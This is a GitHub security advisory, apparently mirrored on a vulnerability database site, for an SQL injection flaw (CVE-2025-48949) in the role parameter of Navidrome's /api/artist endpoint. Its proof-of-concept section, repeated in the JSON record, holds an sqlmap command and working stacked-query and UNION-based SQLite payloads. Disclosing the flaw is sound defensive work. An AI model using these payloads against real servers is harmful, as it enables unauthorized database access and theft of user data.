ghsa-5wgp-vjxm-3x2r
Vulnerability from github
Published
2025-05-29 17:27
Modified
2025-05-30 21:42
Severity ?
8.9 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Summary
Navidrome allows SQL Injection via role parameter
Details

🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2

Overview

This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.

Details

  • Vulnerable Component: API endpoint → /api/artist Parameter → role

  • Vulnerability Type: SQL Injection (stacked queries, UNION queries)

  • Database Affected: SQLite (confirmed exploitation via SQLite-specific payloads)

  • Impact: Successful exploitation allows an unauthenticated attacker to:

  • Execute arbitrary SQL commands

  • Extract or manipulate sensitive data (e.g., user records, playlists)
  • Potentially escalate privileges or disrupt service availability

Proof of Concept (PoC)

Example Exploit Command:

bash sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite

Sample Payloads:

  • Stacked Queries:

http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--

  • UNION-Based Query:

http://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,120,119,119,117,121,81,76,100,71)||CHAR(113,120,112,106,113),92,92,92,92-- Mtny

Example HTTP Request:

http GET /api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist* HTTP/2 Host: <TARGET HOST> Cookie: <REPLACE WITH VALID COOKIE> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json X-Nd-Authorization: <REPLACE WITH AUTH TOKEN> X-Nd-Client-Unique-Id: <REPLACE WITH CLIENT ID>

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.55.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/navidrome/navidrome"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.55.0"
            },
            {
              "fixed": "0.56.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-48949"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-29T17:27:56Z",
    "nvd_published_at": "2025-05-30T20:15:44Z",
    "severity": "HIGH"
  },
  "details": "## \ud83d\udee1 **Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2**\n\n### **Overview**\n\nThis vulnerability arises due to improper input validation on the **`role`** parameter within the API endpoint **`/api/artist`**. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.\n\n---\n\n### **Details**\n\n* **Vulnerable Component**:\n  API endpoint \u2192 `/api/artist`\n  Parameter \u2192 `role`\n\n* **Vulnerability Type**:\n  SQL Injection (stacked queries, UNION queries)\n\n* **Database Affected**:\n  SQLite (confirmed exploitation via SQLite-specific payloads)\n\n* **Impact**:\n  Successful exploitation allows an unauthenticated attacker to:\n\n  * Execute arbitrary SQL commands\n  * Extract or manipulate sensitive data (e.g., user records, playlists)\n  * Potentially escalate privileges or disrupt service availability\n\n---\n\n### **Proof of Concept (PoC)**\n\n**Example Exploit Command**:\n\n```bash\nsqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite\n```\n\n**Sample Payloads**:\n\n* **Stacked Queries**:\n\n  ```\n  http://navidrome/api/artist?_end=15\u0026_order=ASC\u0026_sort=name\u0026_start=0\u0026role=albumartist\u0027);SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--\n  ```\n\n* **UNION-Based Query**:\n\n  ```\n  http://navidrome.local/api/artist?_end=15\u0026_order=ASC\u0026_sort=name\u0026_start=0\u0026role=albumartist\u0027) UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,120,119,119,117,121,81,76,100,71)||CHAR(113,120,112,106,113),92,92,92,92-- Mtny\n  ```\n\n**Example HTTP Request**:\n\n```http\nGET /api/artist?_end=15\u0026_order=ASC\u0026_sort=name\u0026_start=0\u0026role=albumartist* HTTP/2\nHost: \u003cTARGET HOST\u003e\nCookie: \u003cREPLACE WITH VALID COOKIE\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0\nAccept: application/json\nX-Nd-Authorization: \u003cREPLACE WITH AUTH TOKEN\u003e\nX-Nd-Client-Unique-Id: \u003cREPLACE WITH CLIENT ID\u003e\n```\n\n---",
  "id": "GHSA-5wgp-vjxm-3x2r",
  "modified": "2025-05-30T21:42:20Z",
  "published": "2025-05-29T17:27:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/security/advisories/GHSA-5wgp-vjxm-3x2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48949"
    },
    {
      "type": "WEB",
      "url": "https://github.com/navidrome/navidrome/commit/b19d5f0d3e079639904cac95735228f445c798b6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/navidrome/navidrome"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Navidrome allows SQL Injection via role parameter"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.